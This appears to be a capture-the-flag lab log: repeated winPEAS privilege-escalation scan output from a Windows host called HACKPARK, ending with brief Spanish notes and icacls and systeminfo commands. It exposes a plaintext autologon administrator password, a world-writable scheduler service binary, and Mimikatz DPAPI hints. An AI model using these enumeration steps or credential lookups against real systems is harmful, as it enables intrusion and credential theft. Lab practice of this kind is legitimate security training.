C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigMonitor.log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigServiceSettings.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2Runas.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2WallpaperInfo.exe.config
C:\Program Files\Amazon\Ec2ConfigService\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Plugins\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\AWS.EC2.Windows.CloudWatch.Configuration.dll
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\Microsoft.Practices.Unity.Configuration.dll
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\Microsoft.Practices.Unity.Interception.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.CloudWatch.exe.config
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.CloudWatch.log4net.config
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.EC2.Windows.CloudWatch.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\Microsoft.Practices.Unity.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsDomainJoin\AWS.DomainJoin.exe.config
C:\Program Files\Amazon\SSM\Plugins\awsDomainJoin\log4net.config
C:\Program Files\Amazon\Xentools\Installer.exe.config
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Confirm-Password.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\New-RandomPassword.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Send-AdminCredentials.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Randomize-LocalAdminPassword.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\Confirm-Password.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\New-RandomPassword.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\Send-AdminCredentials.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Randomize-LocalAdminPassword.ps1
---
Scan complete.
PowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 4.0
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
[+] MOUNTED DISKS
[i] Maybe you find something interesting
Caption
C:
[+] ENVIRONMENT
[i] Interesting information?
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIG=C:\inetpub\temp\apppools\Blog\Blog.config
APP_POOL_ID=Blog
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=HACKPARK
ComSpec=C:\Windows\system32\cmd.exe
CurrentFolder=C:\Windows\Temp\
CurrentLine= 0x1B[33m[+]0x1B[97m ENVIRONMENT
E=0x1B[
FP_NO_HOST_CHECK=NO
LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local
long=false
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Percentage=1
PercentageTrack=34
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Windows\TEMP
TMP=C:\Windows\TEMP
USERDOMAIN=WORKGROUP
USERNAME=HACKPARK$
USERPROFILE=C:\Windows\system32\config\systemprofile
windir=C:\Windows
[+] INSTALLED SOFTWARE
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
Amazon
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft.NET
SystemScheduler
Windows Mail
Windows Mail
Windows NT
Windows NT
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\Program Files (x86)\SystemScheduler\
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
[+] Remote Desktop Credentials Manager
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
Looking inside C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
The request will be processed at a domain controller for domain WORKGROUP.
USER INFORMATION
----------------
User Name SID
================ ==============================================================
iis apppool\blog S-1-5-82-2734256158-3485737692-275298378-1529073857-2789248872
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
[+] USERS
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest jeff
The command completed with one or more errors.
[+] GROUPS
[+] ADMINISTRATORS GROUPS
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
[+] CURRENT LOGGED USERS
[+] Kerberos Tickets
Current LogonId is 0:0x993a6
Cached Tickets: (0)
[+] CURRENT CLIPBOARD
[i] Any passwords inside the clipboard?
[*] SERVICE VULNERABILITIES
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
C:\Program Files\Amazon\EC2Launch\EC2Launch.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe NT SERVICE\TrustedInstaller:(F)
C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)
C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
Everyone:(I)(M)
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
aspnet_state
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe NT SERVICE\TrustedInstaller:(F)
AWSLiteAgent
C:\Program Files\Amazon\XenTools\LiteAgent.exe
NetTcpPortSharing
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)
PerfHost
C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)
PsShutdownSvc
C:\Windows\PSSDNSVC.EXE
C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)
TrustedInstaller
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)
WindowsScheduler
C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
Everyone:(I)(M)
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
C:\Windows NT SERVICE\TrustedInstaller:(F)
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
Currently stored credentials:
* NONE *
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
[i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Looking inside C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Credentials\
Looking inside C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
NO FUNCIONO BIEN WINPEAS VAMSO A DARLE PERMISOS FULL:
icacls winPEAS.bat /grant Everyone:(RX)
icacls winPEAS.bat /grant Everyone:F
PROBAMOS WINPEAS DE VARIAS FORMAS DANDO PERMISOOS PERO FUNCIONA A MEDIAS; ASI QCONSEGUIMOS LA FECHA DE INSTALACION CON UNCOMANDO MAS DIRECTO; DADO QEU EN LOS FOROS TAMBIEN TODOS TUVIERON EL MISMO PROBLEMA:
c:\windows\system32\inetsrv>systeminfo | findstr /i date
Original Install Date: 8/3/2019, 10:43:23 AM